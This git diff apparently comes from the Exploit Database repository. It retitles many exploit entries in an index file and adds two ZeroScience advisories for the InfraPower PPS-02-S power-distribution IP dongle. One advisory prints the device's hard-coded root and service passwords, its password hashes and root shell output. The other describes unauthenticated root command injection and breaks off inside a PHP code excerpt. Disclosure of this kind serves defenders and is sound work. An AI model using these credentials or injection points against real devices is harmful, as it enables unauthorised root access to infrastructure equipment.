diff --git a/files.csv b/files.csv index 36fa74c4d..e6be23fc0 100755 --- a/files.csv +++ b/files.csv @@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 -4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 +4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 -4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0 -4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0 +4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0 +4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0 -4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 -4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 -4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0 -4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0 -4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0 +4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0 +4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0 +4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0 4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0 4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0 -4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 -4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0 +4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 +4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0 -4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0 +4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0 -4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 +4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 -4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 +4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0 -4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 -4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 -4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 -4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 +4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0 +4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0 +4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 +4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0 4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 -5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 -5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0 -5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0 -5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 -5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 +5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 +5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0 +5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0 +5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 +5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 -5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 -5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 +5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 @@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port 29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0 29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0 29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0 -29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 +29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0 29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 @@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port 32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 -32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0 +32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0 32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0 32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0 @@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port 40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0 40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0 +40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0 +40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0 +40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0 +40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0 +40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0 +40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0 +40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0 diff --git a/platforms/hardware/remote/40643.txt b/platforms/hardware/remote/40643.txt new file mode 100755 index 000000000..b51140711 --- /dev/null +++ b/platforms/hardware/remote/40643.txt @@ -0,0 +1,195 @@ +InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from a use of hard-coded credentials. The IP +dongle firmware ships with hard-coded accounts that can be used to gain +full system access (root) using the telnet daemon on port 23. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5371 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php + + +27.09.2016 + +-- + + +# cat /etc/passwd + +root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh +bin:x:1:1:bin:/bin:/bin/sh +daemon:x:2:2:daemon:/usr/sbin:/bin/sh +adm:x:3:4:adm:/adm:/bin/sh +lp:x:4:7:lp:/var/spool/lpd:/bin/sh +sync:x:5:0:sync:/bin:/bin/sync +shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh +operator:x:11:0:Operator:/var:/bin/sh +nobody:x:99:99:nobody:/home:/bin/sh +admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script +user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script +service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh +www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh +www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh + +# showing accounts in root group: + +Username: root +Password: 8475 +-- +Username: service +Password: ipdongle +-- +Username: www +Password: 9311 +-- +Username: www2 +Password: 9311 + +# showing other less-privileged accounts: + +Username: user +Password: 8475 +-- +Username: admin +Password: 8475 + +-------- + +/mnt/mtd # echo $SHELL +/sbin/root_shell.sh +/mnt/mtd # cat /sbin/root_shell.sh +#!/bin/sh +trap "" 2 3 9 24 + +# check login +passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2` + +if [ "$passWork" = "1" ]; then + login_file=/mnt/mtd/root_login + now_timestamp=`date +%s` + + if [ -f $login_file ]; then + line=`wc -l $login_file | cut -c 1-9` + if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then + pre_login=`tail -n 3 $login_file | cut -d " " -f 1` + pre_result1=`echo $pre_login | cut -d " " -f 1` + pre_result2=`echo $pre_login | cut -d " " -f 2` + pre_result3=`echo $pre_login | cut -d " " -f 3` + if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then + pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2` + result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp` + if [ "$result" != "success" ]; then + echo $result + exit 0 + fi + fi + fi + fi + + echo -n "password:" + read pass + if [ "$pass" != "999" ]; then + echo "wrong password" + echo fail $now_timestamp >> $login_file + exit 0 + fi + echo success $now_timestamp >> $login_file +fi + +/bin/sh +/mnt/mtd # + +-------- + +/mnt/mtd # ls +IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf +PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf +PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log + +-------- + +/mnt/mtd # df -h + +Filesystem Size Used Available Use% Mounted on +tmpfs 256.0M 4.0K 256.0M 0% /tmp +/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd +/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1 +/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2 +/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3 + +-------- + +/www # ls -al + +drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 . +drwxr-xr-x 16 root root 0 Nov 28 11:17 .. +-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php +-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php +-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php +-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php +-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php +-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php +drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General +-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php +-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php +drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images +drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript +-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php +-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php +-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php +-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php +-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php +-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php +-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php +-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php +-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php +-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php +-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php +-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php +-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php +-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php +-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php +-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php +-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php +-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php +-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php +-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php +-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php +-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php +-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php +-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php +-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php +-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php +-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php +-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php +-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php +-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh +-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php +-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php +-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php + diff --git a/platforms/hardware/webapps/40640.txt b/platforms/hardware/webapps/40640.txt new file mode 100755 index 000000000..fdd37727d --- /dev/null +++ b/platforms/hardware/webapps/40640.txt @@ -0,0 +1,348 @@ +InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from multiple unauthenticated remote command +injection vulnerabilities. The vulnerability exist due to several POST +parameters in several scripts not being sanitized when using the exec(), +proc_open(), popen() and shell_exec() PHP function while updating the +settings on the affected device. This allows the attacker to execute +arbitrary system commands as the root user and bypass access controls in +place. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5372 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php + + +27.09.2016 + +-- + + +doupgrate.php: +-------------- + + +09: "; +11: echo "IP=".$_POST["ipaddr"]."
"; +12: echo "Firmware Name=".$_POST["fwname"]."
"; +13: system("sh nfs.sh"); +14: echo "Mounting NFS
